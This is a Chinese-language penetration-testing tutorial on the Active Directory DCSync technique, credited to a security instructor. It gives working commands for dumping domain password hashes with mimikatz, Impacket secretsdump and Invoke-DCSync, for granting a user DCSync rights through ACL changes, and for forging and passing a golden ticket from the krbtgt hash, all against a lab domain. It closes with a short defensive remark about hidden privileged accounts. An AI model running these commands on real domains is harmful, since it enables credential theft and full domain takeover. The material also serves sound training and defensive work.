赞
踩
什么是DCSync
在域环境中,域控制之间每十五分钟就会进行一次域数据同步。当域控制A需要从域控制器B获取数据时,会向其发送一个 GetNCChanges 请求,该请求包含了需要同步的数据,如果获取的数据较多,则会进行循环请求。
DCSync是mimikatz在2015年添加的一个功能,利用的这个原理,通过 Directory Replication Service(DRS) 服务的 GetNCChanges 接口模仿一个域控制器向另一个域控制器发起数据同步请求,能够用来导出域内所有用户的hash。
在 DCSync 功能出现之前,要想获得域用户的哈希,需要登录域控制器,在域控制器上执行代码才能获得域用户的哈希。使用DCSync就可以远程通过域数据同步复制的方式模仿域控从真实的域控当中请求数据获得想要的用户hash。
获得以下任一用户的权限:
默认只有域控主机账号和域管理员能进行Dcsync,其机器账号拥有WriteACL的权限,可以给指定用户添加Dcsync来dump域哈希。
导出administrator用户的Hash
- privilege::debug
- lsadump::dcsync /domain:god.org /user:administrator
image.png
导出域内所有用户的hash
lsadump::dcsync /domain:god.org /all
image.png
Secretsdump.py 是 Impacket 框架中的一个脚本,该脚本也可以通过 DCSync 技术导出域控制器上用户的哈希。该工具的原理是首先使用提供的用户登录凭据通过 smbexec 或者 wmiexec 远程连接至域控制器并获得高权限,进而从注册表中导出本地帐户的哈希,同时通过 Dcsync 或从 NTDS.dit 文件中导出所有域用户的哈希。其最大的优点是支持从域外的计算机连接至域控制器。
导出administrator用户的Hash
proxychains python3 secretsdump.py god/administrator:Admin12345@192.168.3.21 -dc-ip 192.168.3.21 -just-dc-user administrator
image.png
获取所有域用户哈希, 包括机器用户
proxychains python3 secretsdump.py god/administrator:Admin12345@192.168.3.21
image.png
通过Invoke-ReflectivePEinjection调用mimikatz.dll中的dcsync功能
导出域内所有用户的hash:
Invoke-DCSync -DumpForest | ft -wrap -autosize
image.png
导出域内administrator帐户的hash:
Invoke-DCSync -DumpForest -Users @("administrator") | ft -wrap -autosize
image.png
向域内的一个普通用户添加如下三条ACE(Access Control Entries):
向mary用户添加以上三条ACE
Add-DomainObjectAcl -TargetIdentity "DC=god,DC=org" -PrincipalIdentity mary -Rights DCSync -Verbose
!
image.png
通过secretsdump导出域管账号hash
proxychains python3 secretsdump.py 'god/mary:admin!@#45'@192.168.3.21 -dc-ip 192.168.3.21 -just-dc-user administrator
image.png
通过mimikatz导出所有账号hash
mimikatz.exe privilege::debug "lsadump::dcsync /domain:god.org /all /csv" exit
使用runas实现登录mary再使用DCSync
runas /noprofile /user:god\mary cmd
image.png
AdFind.exe -s subtree -b "DC=god,DC=org" -sdna nTSecurityDescriptor -sddl+++ -sddlfilter ;;;"Replicating Directory Changes";; -recmute
image.png
使用 Mimikatz 的 DCSync 功能导出域控制器中 krbtgt 账户的哈希:
lsadump::dcsync /domain:god.org /user:krbtgt
image.png
通过 krbtgt 账户的哈希生成黄金票据
kerberos::golden /user:administrator /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /krbtgt:b097d7ed97495408e1537f706c357fc5 /ticket:Administrator.kiribi
image.png
当前访问域控资源,是被拒绝的
image.png
进行票据传递
kerberos::ptt Administrator.kiribi
image.png
再次访问域控资源
image.png
具有高权限但不在高权限组的用户被称之为Shadow Admin,例如域用户mary,仅通过查询高权限组的成员无法发现域内的Shadow Admin
可使用ACLight工具枚举Active Directory中所有用户的ACL,标记出特权帐户。
本期作者李忻蔚:深信服安全服务认证专家(SCSE-S),产业教育中心资深讲师,曾任职于中国电子科技网络信息安全有限公司,担任威胁情报工程师、渗透测试工程师、安全讲师;多年来为政府部门进行安全培训,安全服务;多次参与国家级、省级攻防比武的出题和保障任务,擅长Web安全、渗透测试与内网渗透方向。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。